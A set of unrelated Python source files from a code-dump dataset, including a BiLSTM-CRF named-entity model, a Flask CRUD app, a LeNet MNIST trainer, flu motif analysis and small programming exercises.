6)\n self.ffnn_tag3 = nn.Linear((200+hidden_dim) * 6, self.label_size * 9)\n self.tag3_tag = nn.Linear(self.label_size * 9, self.label_size)\n\n self.transitions = nn.Parameter(torch.full((self.label_size, self.label_size), -4.))\n # add initialized hard-coded transition values if needed\n for i in range(self.label_size):\n for j in range(self.label_size):\n if (i == 0 and j in [0, 1, 3, 4, 6]) \\\n or (i in [1, 2] and j in [0, 2]) \\\n or (i in [3, 8] and j in [0, 8]) \\\n or (i in [4, 5] and j in [0, 5]) \\\n or (i in [6, 7] and j in [0, 7]):\n self.transitions.data[i, j] = 0.\n elif (i in [1, 3, 4, 6] and j in [1, 3, 4, 6]) \\\n or (i in [2, 5, 7, 8] and j in [1, 3, 4, 6]):\n self.transitions.data[i, j] = 0.\n\n # self.start_trans = nn.Parameter(torch.full((self.label_size,), -100.))\n # for i in range(self.label_size):\n # if i in [3,5,7,8]:\n # self.start_trans.data[i] = 0.\n\n self.crf = CRF(num_tags=self.label_size, batch_first=True)\n self.crf.start_transitions = nn.Parameter(torch.zeros(self.label_size, ))\n self.crf.end_transitions = nn.Parameter(torch.zeros(self.label_size, ))\n self.crf.transitions = self.transitions\n\n def _get_lstm_attn_features(self, sentences, sent_em, lengths):\n embeds1 = self.word_embeds1(sentences) # (batch, 80, 100)\n embeds2 = self.word_embeds2(sent_em)\n\n second_embeds1 = self.second_word_embeds1(sentences)\n second_embeds2 = self.second_word_embeds2(sent_em)\n\n pos = torch.IntTensor(np.asarray([np.arange(0, 80, 1)] * embeds1.shape[0]))\n pos_embeds = self.pos_embeds(pos)\n second_pos_embeds = self.second_pos_embeds(pos)\n\n trig_embeds = self.trig_pos_embeds(pos)\n\n char_idx = utils.get_char_pos(sentences, lengths, 
self.id2word)\n char_embeds = self.char_pos_embeds(torch.IntTensor(char_idx))\n second_char_embeds = self.second_char_pos_embeds(torch.IntTensor(char_idx))\n\n # sin_enc, cos_enc = utils.get_trig_emb(embeds1.shape[0], embeds1.shape[1])\n # sin_embeds = self.sin_embeds(torch.IntTensor(sin_enc))\n # cos_embeds = self.sin_embeds(torch.IntTensor(cos_enc))\n\n # print(f\"pos embed shape: {pos_embeds.shape}\")\n # pos_input = torch.transpose(pos_embeds, 0, 1)\n\n # input = torch.transpose(embeds, 0, 1) # (80, batch, 100)\n # input = self.drop(input)\n\n # concat_input = torch.cat((pos_input, input), dim=2)\n # lstm_out, _ = self.lstm(self.drop(concat_input)) # lstm_out: (80, batch, 240)\n\n concat_embed0 = torch.cat((second_pos_embeds, second_char_embeds, second_embeds1, second_embeds2), dim=2)\n concat_embed0 = torch.transpose(concat_embed0, 1, 2) # (batch, 320, 80)\n rnn_input1 = self.batch_norm0(concat_embed0)\n rnn_input1 = rnn_input1.permute(2, 0, 1)\n rnn_out1, _ = self.rnn1(self.drop0(rnn_input1))\n rnn_out1 = self.drop(rnn_out1)\n\n concat_embed1 = torch.cat((pos_embeds, trig_embeds, char_embeds,\n embeds1, embeds2), dim=2)\n # print(concat_embed.shape)\n concat_embed1 = torch.transpose(concat_embed1, 1, 2) # (batch, 320, 80)\n\n concat_input0 = self.conv0(concat_embed1)\n concat_input1 = self.conv1(concat_embed1)\n\n # each one is (batch, 120, 80)\n # first concat, then batch_norm, permute, and drop\n concat_input = self.batch_norm1(torch.cat((concat_input0, concat_input1), dim=1))\n concat_input = concat_input.permute(2, 0, 1)\n # rnn_out1, _ = self.rnn(self.drop(concat_input)) # rnn_out: (80, batch, 600)\n # rnn_out1 = self.drop(rnn_out1)\n\n rnn_out2, _ = self.rnn2(self.drop(concat_input)) # rnn_out: (80, batch, 600)\n rnn_out2 = self.drop(rnn_out2)\n\n rnn_out = torch.cat((rnn_out1, rnn_out2), dim=2)\n padding_mask = torch.zeros(rnn_out.shape[1], rnn_out.shape[0], dtype=torch.int) # (batch, 80)\n for i in range(rnn_out.shape[1]):\n if lengths[i] < rnn_out.shape[0]:\n padding_mask[i, lengths[i]:] = 1\n\n # Q, K, V: lstm_out\n attn_output1, _ = self.multi_attn1.forward(rnn_out, rnn_out, rnn_out, key_padding_mask=padding_mask)\n\n # the batch norm layer expects an input in [batch_size, features, temp.dim],\n # which is [batch_size, features, 80]\n\n attn_output2, _ = self.multi_attn2.forward(attn_output1, attn_output1, attn_output1, key_padding_mask=padding_mask)\n\n # output = self.hidden1_2(self.drop(attn_output)) # output: (80, batch, 120)\n # features = self.hidden2_tag(self.drop(output)) # features: (80, batch, tag_size)\n # feature1 = self.attn1_tag(attn_output1)\n # feature2 = self.attn2_tag(attn_output2)\n # rnn_feats = self.rnn_tag(rnn_out)\n\n features = torch.cat((attn_output1, attn_output2, rnn_out), dim=2)\n features = self.batch_norm_ffnn(features.permute(1, 2, 0))\n features = self.ffnn_tag3(features.permute(2, 0, 1))\n\n # features = torch.cat((feature1, feature2, rnn_feats), dim=2)\n # print(features.shape) # (80, batch_size, 3 * tag_size)\n features = self.tag3_tag(features)\n return features\n\n def neg_log_likelihood(self, sentences, sent_em, tags, lengths, mask):\n feats = self._get_lstm_attn_features(sentences, sent_em, lengths)\n\n # feats: (80, batch_size, tag_size)\n # tags: (batch_size, 80)\n feats = torch.transpose(feats, 0, 1)\n\n ll_loss = self.crf.forward(emissions=feats, tags=tags, mask=mask)\n return -ll_loss\n\n def forward(self, sentence, sent_em, length, mask): # don't confuse this with _forward_alg above.\n # Get the emission scores from the BiLSTM\n 
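# (inference here runs one sentence at a time, so length is wrapped in a single-element list)\n 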
features = self._get_lstm_attn_features(sentence, sent_em, [length]) # (80, 1, tag_size)\n feats = torch.transpose(features, 0, 1)\n\n # Find the best path, given the features.\n tag_seq = self.crf.decode(emissions=feats, mask=mask)\n return tag_seq\n\n\n# training function\ndef model_train(train_word, train_word_em, train_length, train_label, dev_word, dev_word_em, dev_length, dev_label,\n test_word, test_word_em, test_length, test_label, setting: preprocess_update.Setting, tag_id, id_tag,\n vector, vector_em, id_to_word) -> Bilstm_crf:\n pretrained_weight1 = torch.FloatTensor(vector)\n pretrained_weight2 = torch.FloatTensor(vector_em)\n batch_size = 8\n\n model = Bilstm_crf(vocab_size=len(vector), tag_to_id=tag_id, id_to_tag=id_tag,\n embedding_dim=2*len(vector[0]), hidden_dim=400,\n pretrained_weight1=pretrained_weight1, pretrained_weight2=pretrained_weight2,\n batch_size=batch_size, drop_out=0.35, num_steps=setting.num_steps,\n id2word=id_to_word)\n\n seg_length = setting.num_steps\n train_mask = torch.zeros(train_word.shape[0], seg_length, dtype=torch.uint8) # (1350, 80)\n for i in range(train_word.shape[0]):\n train_mask[i, 0:train_length[i]] = 1\n\n dev_mask = torch.zeros(dev_word.shape[0], seg_length, dtype=torch.uint8) # (270, 80)\n for i in range(dev_word.shape[0]):\n dev_mask[i, 0:dev_length[i]] = 1\n\n test_mask = torch.zeros(test_word.shape[0], seg_length, dtype=torch.uint8) # (270, 80)\n for i in range(test_word.shape[0]):\n test_mask[i, 0:test_length[i]] = 1\n\n # model.train()\n # torch.autograd.set_detect_anomaly(True)\n learning_rate = 0.0005\n # learning_rate = 0.001\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n epochs = 45\n\n for epoch in range(epochs):\n model.train()\n torch.manual_seed(epoch)\n shuffle = torch.randperm(train_word.shape[0])\n total_loss = 0\n for i in range(train_word.shape[0] // batch_size): # range(54)\n # print(f\"pre-shape: {pretrained_weight.shape}\")\n model.zero_grad()\n sentences = torch.LongTensor(train_word[shuffle[i * batch_size:(i + 1) * batch_size], :]) # (batch, 80)\n sent_em = torch.LongTensor(train_word_em[shuffle[i * batch_size:(i + 1) * batch_size], :])\n # print(f\"sentences: {sentences}\")\n tags = torch.LongTensor(train_label[shuffle[i * batch_size:(i + 1) * batch_size], :]) # (batch, 80)\n lengths = train_length[shuffle[i * batch_size:(i + 1) * batch_size]] # (batch)\n mask = train_mask[shuffle[i * batch_size:(i + 1) * batch_size], :]\n\n loss = model.neg_log_likelihood(sentences, sent_em, tags, lengths, mask) / batch_size\n # gradient/loss clipping\n # if loss > 100: loss /= 200\n total_loss += loss * batch_size\n\n if i % 20 == 0:\n print(f\"loss at epoch {epoch} batch {i} is {loss}\")\n loss.backward()\n optimizer.step()\n\n # one more step if training size is not divisible by batch size\n if train_word.shape[0] % batch_size != 0:\n last_idx = (train_word.shape[0] // batch_size) * batch_size\n model.zero_grad()\n sentences = torch.LongTensor(train_word[shuffle[last_idx:], :]) # (remained, 80)\n sent_em = torch.LongTensor(train_word_em[shuffle[last_idx:], :])\n tags = torch.LongTensor(train_label[shuffle[last_idx:], :]) # (remained, 80)\n lengths = train_length[shuffle[last_idx:]] # (remained)\n mask = train_mask[shuffle[last_idx:], :]\n\n loss = model.neg_log_likelihood(sentences, sent_em, tags, lengths, mask) / (train_word.shape[0] - last_idx)\n total_loss += loss * (train_word.shape[0] - last_idx)\n loss.backward()\n optimizer.step()\n\n print(f\"total loss after epoch {epoch} is 
{total_loss}\")\n\n model.eval()\n print(f\"start dev evaluate after epoch {epoch}: \")\n pred_label = []\n for i in range(dev_label.shape[0]):\n sentence = torch.IntTensor(dev_word[i].reshape(1, -1))\n sent_em = torch.IntTensor(dev_word_em[i].reshape(1, -1))\n mask = dev_mask[i, :].reshape(1, -1)\n pred = model.forward(sentence, sent_em, dev_length[i], mask)\n pred_label.append(pred[0])\n\n sent_entity = [['O' for i in range(dev_label.shape[1])] for j in range(dev_label.shape[0])]\n pred_entity = [['O' for i in range(dev_label.shape[1])] for j in range(dev_label.shape[0])]\n\n for idx in range(dev_label.shape[0]):\n for i in range(dev_length[idx]):\n sent_entity[idx][i] = id_tag[dev_label[idx, i]]\n pred_entity[idx][i] = id_tag[pred_label[idx][i]]\n\n # print('start evaluation......')\n utils.entity_eval(sent_entity, pred_entity)\n\n print(f\"start test evaluate after epoch {epoch}: \")\n model.eval()\n pred_label = []\n for i in range(test_label.shape[0]):\n sentence = torch.IntTensor(test_word[i].reshape(1, -1))\n sent_em = torch.IntTensor(test_word_em[i].reshape(1, -1))\n mask = test_mask[i, :].reshape(1, -1)\n pred = model.forward(sentence, sent_em, test_length[i], mask)\n pred_label.append(pred[0])\n\n sent_entity = [['O' for i in range(test_label.shape[1])] for j in range(test_label.shape[0])]\n pred_entity = [['O' for i in range(test_label.shape[1])] for j in range(test_label.shape[0])]\n\n for idx in range(test_label.shape[0]):\n for i in range(test_length[idx]):\n sent_entity[idx][i] = id_tag[test_label[idx, i]]\n pred_entity[idx][i] = id_tag[pred_label[idx][i]]\n\n # print('start evaluation......')\n utils.entity_eval(sent_entity, pred_entity)\n\n return model\n","repo_name":"ck44liu/NER-for-Chinese-social-media","sub_path":"model_combined.py","file_name":"model_combined.py","file_ext":"py","file_size_in_byte":15890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72864695846","text":"#!/usr/bin/env python3\n\ndef isIn(char, aStr):\n '''\n char: a single character\n aStr: an alphabetized string\n \n returns: True if char is in aStr; False otherwise\n '''\n if len(aStr) == 0:\n return False\n\n midchar = aStr[len(aStr) // 2]\n\n if midchar == char:\n return True\n\n if midchar < char:\n return isIn(char, aStr[len(aStr) // 2 + 1:])\n\n return isIn(char, aStr[:len(aStr) // 2])\n","repo_name":"rosaelton/OSSU-02.2-MITx-6.00.1x-Intro-To-CS-using-Python","sub_path":"unit-02/isin.py","file_name":"isin.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8703958877","text":"import pandas as pd\n\ndata = \"https://s3.us-east-2.amazonaws.com/bites-data/menu.csv\"\n# load the data in once, functions will use this module object\ndf = pd.read_csv(data)\n\npd.options.mode.chained_assignment = None # ignore warnings\n\n\ndef get_food_most_calories(df=df):\n \"\"\"Return the food \"Item\" string with most calories\"\"\"\n return df[df.Calories == df.Calories.max()].iloc[0].Item\n\n\ndef get_bodybuilder_friendly_foods(df=df, excl_drinks=False):\n \"\"\"Calulate the Protein/Calories ratio of foods and return the\n 5 foods with the best ratio.\n\n This function has a excl_drinks switch which, when turned on,\n should exclude 'Coffee & Tea' and 'Beverages' from this top 5.\n\n You will probably need to filter out foods with 0 calories to get the\n right results.\n\n Return a list of the top 5 foot Item stings.\"\"\"\n 
df.drop(df[df.Calories == 0].index, inplace=True)\n\n df['PC_Ratio'] = df.Protein / df.Calories\n\n if excl_drinks:\n df = df[(df.Category != 'Coffee & Tea') & (df.Category != 'Beverages')]\n\n top_5 = list(df.sort_values(by=['PC_Ratio'], ascending=False).iloc[0:5].Item)\n\n return top_5\n","repo_name":"syurskyi/Python_Topics","sub_path":"125_algorithms/_examples/_algorithms_challenges/pybites/without_level/170/mcdonalds.py","file_name":"mcdonalds.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"8411631288","text":"def main():\n A_FROM = 2\n A_TO = 101\n A_RANGE = (2,101)\n B_FROM = 2\n B_TO = 101\n\n numbers = set()\n\n for a in range(A_FROM, A_TO):\n for b in range(B_FROM, B_TO):\n x = a**b # it can be boosted\n numbers.add(x)\n\n result = len(numbers)\n print(\"result:\", result)\n\nif __name__ == \"__main__\":\n main()","repo_name":"utevo/ProjectEuler-solutions","sub_path":"Problem 029/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24235190446","text":"import math\r\n\r\narray = [i for i in range(2*123456+1)]\r\narray[0], array[1] = False, False\r\n\r\nfor i in range(2, 2*123456+1) :\r\n for j in range(2, int(math.sqrt(i)+1)) :\r\n if array[i] % j == 0 : \r\n array[i] = False\r\n break\r\n else : array[i] = True\r\n\r\nwhile True :\r\n n = int(input())\r\n if n == 0 : break\r\n\r\n cnt = 0\r\n for i in range(n+1, 2*n+1) :\r\n if array[i] == True : cnt += 1\r\n print(cnt)","repo_name":"skawhd9588/BOJ_Algorithm","sub_path":"64. No.4948 베르트랑 공준2.py","file_name":"64. No.4948 베르트랑 공준2.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15286867792","text":"import os\nos.environ['THEANO_FLAGS'] = \"device=cuda0,force_device=True,floatX=float32,dnn.enabled=False,gcc.cxxflags=-Wno-narrowing,gpuarray.preallocate=0.4\"\n#gcc.cxxflags=-Wno-narrowing\nimport theano\nfrom pyimagesearch import load_MNIST, load_target_MNIST\nfrom pyimagesearch.nn.conv.lenet import LeNet\nfrom keras.optimizers import SGD\nfrom sklearn.preprocessing import LabelBinarizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom sklearn import datasets\nfrom keras import backend as K\nimport matplotlib.pyplot as plt\nimport numpy as np\n\npath = '/home/pavel/PycharmProjects/nn/pyimagesearch/mnist-original.mat'\n\nprint(\"[INFO] accessing MNIST...\")\ndata = load_MNIST(path)\n\nif K.image_data_format() == \"channels_first\":\n data = data.reshape(data.shape[0], 1, 28, 28)\nelse:\n data = data.reshape(data.shape[0], 28, 28, 1)\n\n(trainX, testX, trainY, testY) = train_test_split(data / 255.0, load_target_MNIST(path).astype('int'), test_size=0.25, random_state=42)\n\nle = LabelBinarizer()\ntrainY = le.fit_transform(trainY)\ntestY = le.transform(testY)\n\nprint(\"[INFO] compiling model...\")\n\nmodel = LeNet.build(width=28, height=28, depth=1, classes=10)\nmodel.compile(loss=\"categorical_crossentropy\", optimizer=SGD(lr=0.01), metrics=[\"accuracy\"])\n\nprint(\"[INFO] training network...\")\nH = model.fit(trainX, trainY, validation_data=(testX, testY), batch_size=128, epochs=20, verbose=1)\n\nprint(\"[INFO] evaluating network...\")\npredictions = model.predict(testX, 
batch_size=128)\nprint(classification_report(testY.argmax(axis=1), predictions.argmax(axis=1), target_names=[str(x) for x in le.classes_]))\n\nplt.style.use(\"ggplot\")\nplt.figure()\nplt.plot(np.arange(0, 20), H.history[\"loss\"], label=\"train_loss\")\nplt.plot(np.arange(0, 20), H.history[\"val_loss\"], label=\"val_loss\")\nplt.plot(np.arange(0, 20), H.history[\"acc\"], label=\"train_acc\")\nplt.plot(np.arange(0, 20), H.history[\"val_acc\"], label=\"val_acc\")\nplt.title(\"Training Loss and Accuracy\")\nplt.xlabel(\"Epoch #\")\nplt.ylabel(\"Loss/Accuracy\")\nplt.legend()\nplt.show()\n","repo_name":"PaulZoni/nn","sub_path":"pyimagesearch/testmodel/lenet_mnist.py","file_name":"lenet_mnist.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32907371250","text":"#!/usr/bin/python\n\nimport sys\nimport os\nimport logging\n\nclass MyLogging(object):\n \"\"\"\n Common Logging module\n \"\"\"\n def __init__(self):\n pass\n\n def log(self, level, log_string):\n if level == \"info\":\n logging.info(log_string)\n if level == \"error\":\n logging.error(log_string)\n if level == \"warning\":\n logging.warning(log_string)\n if level == \"debug\":\n logging.debug(log_string)\n if level == \"critical\":\n logging.critical(log_string)\n print(log_string)\n \ndef setup_log_file_name(lglevel, log_file_name):\n \"\"\"\n Function to setup the testcase like setting up the logging\n with proper settings\n \"\"\"\n # Set the log level accordingly\n if(lglevel == \"debug\"):\n logLevel=logging.DEBUG\n elif(lglevel == \"info\"):\n logLevel=logging.INFO\n elif(lglevel == \"warning\"):\n logLevel=logging.WARNING\n elif(lglevel == \"error\"):\n logLevel=logging.ERROR\n elif(lglevel == \"critical\"):\n logLevel=logging.CRITICAL\n else:\n # Set default level\n logLevel=logging.INFO\n\n # Set log format with time/date, logLevel and message\n logFormat='%(asctime)s %(levelname)-8s %(message)s'\n\n # Set date format\n logDateFmt='%d %b %H:%M:%S'\n\n # Set log file name\n _inputDir = os.path.dirname(os.path.abspath(sys.argv[0]))\n #_logDir = _inputDir + \"/Logs\"\n _logDir = os.path.join(_inputDir, \"Logs\")\n\n # Logs directory exist?\n if not os.path.exists(_logDir):\n os.makedirs(_logDir)\n\n logFileName = os.path.join(_logDir, log_file_name+\".log\")\n\n print(logFileName)\n\n # Set log file mode as write\n logFileMode='w'\n # Now, configure the logging\n logging.basicConfig(level=logLevel,\n format=logFormat,\n datefmt=logDateFmt,\n filename=logFileName,\n filemode=logFileMode)\n","repo_name":"dipakdash/python","sub_path":"tools/perf/myLogging.py","file_name":"myLogging.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15556803999","text":"from collections import defaultdict\nimport utils_motif, sys, utils_graph\n\ndef get_aa_freqs(afile):\n d = {}\n elms = {}\n with open(afile) as f:\n for line in f:\n [elm, v] = line.strip().split('\\t')\n d[elm] = float(v)\n elms[elm] = True\n return (d, elms)\n\ndef check_gtr(elm, elm2fracs):\n return (elm2fracs[elm]['human'] > elm2fracs[elm]['chicken'] and elm2fracs[elm]['human'] > elm2fracs[elm]['finch'] and elm2fracs[elm]['swine'] > elm2fracs[elm]['chicken'] and elm2fracs[elm]['swine'] > elm2fracs[elm]['finch'])\n\ndef check_less(elm, elm2fracs):\n return (elm2fracs[elm]['human'] < elm2fracs[elm]['chicken'] and elm2fracs[elm]['human'] < elm2fracs[elm]['finch'] and 
elm2fracs[elm]['swine'] < elm2fracs[elm]['chicken'] and elm2fracs[elm]['swine'] < elm2fracs[elm]['finch'])\n\nelm2fracs = {}\nwith open(sys.argv[1]) as f:\n f.readline()\n for line in f:\n [elm, human, swine, chicken, finch] = line.strip().split('\\t')\n elm2fracs[elm] = {'human':float(human),\n 'swine':float(swine),\n 'chicken':float(chicken),\n 'finch':float(finch)}\n# del elm2fracs['LIG_PDZ_3']\n# #del elm2fracs['MOD_GSK3_1']\n# #del elm2fracs['MOD_CK1_1']\n# #del elm2fracs['MOD_CK2_1']\n\naa_freqs = {'human':get_aa_freqs('results/H_sapiens.elm_aa_freq'),\n 'chicken':get_aa_freqs('results/Gallus_gallus.elm_aa_freq'),\n 'finch':get_aa_freqs('results/Taeniopygia_guttata.elm_aa_freq'),\n 'swine':get_aa_freqs('results/Sus_scrofa.elm_aa_freq')}\nfreq_elms = {}\nfor k in aa_freqs:\n d, e = aa_freqs[k]\n for elm in e:\n freq_elms[elm] = True\n# del freq_elms['LIG_PDZ_3']\n# del freq_elms['MOD_CK1_1']\n# del freq_elms['MOD_CK2_1']\n# del freq_elms['MOD_GSK3_1']\nelm2freq = {}\nfor elm in freq_elms:\n elm2freq[elm] = {}\n for s in aa_freqs:\n if elm in aa_freqs[s][0]:\n elm2freq[elm][s] = aa_freqs[s][0][elm]\n else:\n elm2freq[elm][s] = float(0)\n\ncut = sys.argv[2]\nd = {'ELM':True}\nswine_H1N1_elms = utils_motif.protein2annotation('results/swine.H1N1.elms.' + cut, d)\nswine_H3N2_elms = utils_motif.protein2annotation('results/swine.H3N2.elms.' + cut, d)\nswine = [swine_H1N1_elms, swine_H3N2_elms]\n\nhuman_H1N1_elms = utils_motif.protein2annotation('results/human.H1N1.elms.' + cut, d)\nhuman_H3N2_elms = utils_motif.protein2annotation('results/human.H3N2.elms.' + cut, d)\nhuman_H5N1_elms = utils_motif.protein2annotation('results/human.H5N1.elms.' + cut, d)\nhuman = [human_H1N1_elms, human_H3N2_elms, human_H5N1_elms]\n\nchicken_H5N1_elms = utils_motif.protein2annotation('results/chicken.H5N1.elms.' + cut, d)\nchicken_H9N2_elms = utils_motif.protein2annotation('results/chicken.H9N2.elms.' + cut, d)\nchicken = [chicken_H5N1_elms, chicken_H9N2_elms]\n\nduck_H5N1_elms = utils_motif.protein2annotation('results/duck.H5N1.elms.' + cut, d)\nduck_H9N2_elms = utils_motif.protein2annotation('results/duck.H9N2.elms.' 
+ cut, d)\nduck = [duck_H5N1_elms, duck_H9N2_elms]\n\n# these {}s are not completely right\n# b/c they may miss proteins not present\n# in the starting {}\ncommon_all = defaultdict(dict)\ncommon_all_elms = {}\nfor protein in human[0]:\n for elm in human[0][protein]:\n not_found = False\n for h in human[1:]:\n if protein in h:\n if not elm in h[protein]:\n not_found = True\n for s in swine:\n if protein in s:\n if not elm in s[protein]:\n not_found = True\n for c in chicken:\n if protein in c:\n if not elm in c[protein]:\n not_found = True\n for d in duck:\n if protein in d:\n if not elm in d[protein]:\n not_found = True\n if not not_found:\n common_all[protein][elm] = True\n common_all_elms[elm] = True\n\ncommon_mammal = defaultdict(dict)\nmammal_elms = {}\nfor protein in human[0]:\n for elm in human[0][protein]:\n not_found = False\n for h in human[1:]:\n if protein in h:\n if not elm in h[protein]:\n not_found = True\n for s in swine:\n if protein in s:\n if not elm in s[protein]:\n not_found = True\n if not not_found:\n common_mammal[protein][elm] = True\n mammal_elms[elm] = True\n\ncommon_bird = defaultdict(dict)\nbird_elms = {}\nfor protein in chicken[0]:\n for elm in chicken[0][protein]:\n not_found = False\n for c in chicken[1:]:\n if protein in c:\n if not elm in c[protein]:\n not_found = True\n for d in duck:\n if protein in d:\n if not elm in d[protein]:\n not_found = True\n if not not_found:\n common_bird[protein][elm] = True\n bird_elms[elm] = True\n\nuse_elms = {}\ncontrol_elms = {}\nfor protein in common_mammal:\n if protein in common_bird:\n for elm in common_mammal[protein]:\n if not elm in common_bird[protein]:\n use_elms[elm] = True#print protein + '\\t' + elm\n else:\n control_elms[elm] = True\nfor protein in common_bird:\n if protein in common_mammal:\n for elm in common_bird[protein]:\n if not elm in common_mammal[protein]:\n use_elms[elm] = True\n else:\n control_elms[elm] = True\n\n# test_elms = {}\n# with open('mammal_bird.test', 'w') as f:\n# for elm in use_elms:\n# if elm in elm2fracs:\n# if elm in mammal_elms and elm in bird_elms:\n# control_elms[elm] = True\n# else:\n# test_elms[elm] = True\n# if check_gtr(elm, elm2fracs):\n# f.write(elm + '\\tGTR\\n')\n# elif check_less(elm, elm2fracs):\n# f.write(elm + '\\tLESS\\n')\n# else:\n# f.write(elm + '\\tSAME\\n')\n# else:\n# if (elm in mammal_elms and not elm in bird_elms) or (elm in bird_elms and not elm in mammal_elms):\n# print elm\n\n# with open('mammal_bird.notTest', 'w') as f:\n# for elm in control_elms:\n# if not elm in test_elms:\n# if elm in elm2fracs:\n# if check_gtr(elm, elm2fracs):\n# f.write(elm + '\\tGTR\\n')\n# elif check_less(elm, elm2fracs):\n# f.write(elm + '\\tLESS\\n')\n# else:\n# f.write(elm + '\\tSAME\\n')\n\ntest_elms = {}\nwith open('mammal_bird.' + cut + '.test', 'w') as f:\n for elm in utils_graph.intersectLists([use_elms,freq_elms]):\n if elm in mammal_elms and elm in bird_elms:\n control_elms[elm] = True\n elif elm in elm2fracs:\n test_elms[elm] = True\n if check_gtr(elm, elm2fracs):\n f.write(elm + '\\tGTR\\n')\n elif check_less(elm, elm2fracs):\n f.write(elm + '\\tLESS\\n')\n else:\n f.write(elm + '\\tSAME\\n')\n else:\n test_elms[elm] = True\n if check_gtr(elm, elm2freq):\n f.write(elm + '\\tGTR\\n')\n elif check_less(elm, elm2freq):\n f.write(elm + '\\tLESS\\n')\n else:\n f.write(elm + '\\tSAME\\n')\n\nwith open('mammal_bird.' 
+ cut + '.notTest', 'w') as f:\n for elm in freq_elms:\n if not elm in test_elms:\n if elm in elm2fracs:\n if check_gtr(elm, elm2fracs):\n f.write(elm + '\\tGTR\\n')\n elif check_less(elm, elm2fracs):\n f.write(elm + '\\tLESS\\n')\n else:\n f.write(elm + '\\tSAME\\n')\n else:\n if check_gtr(elm, elm2freq):\n f.write(elm + '\\tGTR\\n')\n elif check_less(elm, elm2freq):\n f.write(elm + '\\tLESS\\n')\n else:\n f.write(elm + '\\tSAME\\n')\n\n# with open('mammal_bird.notTest', 'w') as f:\n# for elm in utils_graph.intersectLists([control_elms,freq_elms]):\n# if not elm in test_elms:\n# if elm in elm2fracs:\n# if check_gtr(elm, elm2fracs):\n# f.write(elm + '\\tGTR\\n')\n# elif check_less(elm, elm2fracs):\n# f.write(elm + '\\tLESS\\n')\n# else:\n# f.write(elm + '\\tSAME\\n')\n# else:\n# if check_gtr(elm, elm2freq):\n# f.write(elm + '\\tGTR\\n')\n# elif check_less(elm, elm2freq):\n# f.write(elm + '\\tLESS\\n')\n# else:\n# f.write(elm + '\\tSAME\\n')\n\nutils_graph.dumpNodes('common_bird', utils_graph.intersectLists([elm2fracs,bird_elms]))\nutils_graph.dumpNodes('common_mammal', utils_graph.intersectLists([elm2fracs,mammal_elms]))\n \n\n","repo_name":"JudoWill/flELM","sub_path":"get_mammal_bird_diffs.py","file_name":"get_mammal_bird_diffs.py","file_ext":"py","file_size_in_byte":9046,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"759877866","text":"from application import app, db\nfrom application.models import Games\n\n@app.route('/add')\ndef add():\n new_game = Games(name=\"New Game\")\n if Games.query.filter_by(name=new_game.name).first() is not None:\n return \"Please enter a unique game title, as this game already exists\"\n else: \n db.session.add(new_game)\n db.session.commit()\n return \"Added new game to database\"\n\n@app.route('/add/<name>')\ndef add2(name):\n if Games.query.filter_by(name=name).first() is not None:\n return \"Game already contained within list\"\n else:\n new_game2 = Games(name=\"default\")\n new_game2.name = name\n db.session.add(new_game2)\n db.session.commit()\n return new_game2.name\n\n@app.route('/read')\ndef read():\n all_games = Games.query.all()\n games_string = \"\"\n for game in all_games:\n games_string += \"
\"+ game.name\n return games_string + \"
There are \" + str(Games.query.count()) + \" Games in the database\"\n\n@app.route('/update//')\ndef update(nameold,namenew):\n game = Games.query.filter_by(name=nameold).first()\n nameold = game\n nameoldval = nameold.name\n if game is not None:\n game.name = namenew\n db.session.commit()\n return str(nameoldval) + \" is now known as \" + str(namenew)\n else:\n return \"Not available to update\"\n\n@app.route('/delete')\ndef delete():\n last_game = Games.query.first()\n db.session.delete(last_game)\n db.session.commit()\n return \"Deleted first game from database\"\n\n@app.route('/delete/')\ndef delete1(name):\n game = Games.query.filter_by(name=name).first()\n if game is not None:\n db.session.delete(game)\n db.session.commit()\n return \"Specified game deleted\"\n else:\n return \"Specified game not available\"","repo_name":"Bkirkb/QA-Excercises","sub_path":"excercise3/application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17136049018","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 16 22:00:00 2021\n\n@author: Lee SeonWoo\n\"\"\"\n#Pytorch Package\nimport torch\nfrom torch import nn, optim\nfrom torch.nn.modules.loss import BCEWithLogitsLoss\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\n#Learning Rate Scheduler\nfrom torch.optim import lr_scheduler\n#Tensorboard\nfrom torch.utils.tensorboard import SummaryWriter\n\n#Utility Package\nimport os\nimport json\nimport argparse\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nfrom sklearn.metrics import precision_score, recall_score\n#Custom Package\nfrom utils.config import Hyperparameter\nfrom utils.air_dataloader import AirDataSet as DataLoader\n\nfrom utils.utils import plot_loss_graph, \\\n get_performance, \\\n plot_confusion_matrix,\\\n get_probability_distribution,\\\n f1_score,\\\n accuracy_fn,\\\n get_network\n#Custom Trainer\nfrom utils.trainer import Trainer\nfrom utils.lr_scheduler import CosineAnnealingWarmupRestarts\nfrom torchvision import models\n\ntime = datetime.now()\ntime = time.strftime(\"%y%m%d%H%M\")\n\nlog_path = os.path.join(Hyperparameter.log_dir, time)\nbatch_size = Hyperparameter.BATCH_SIZE\ninput_channels = 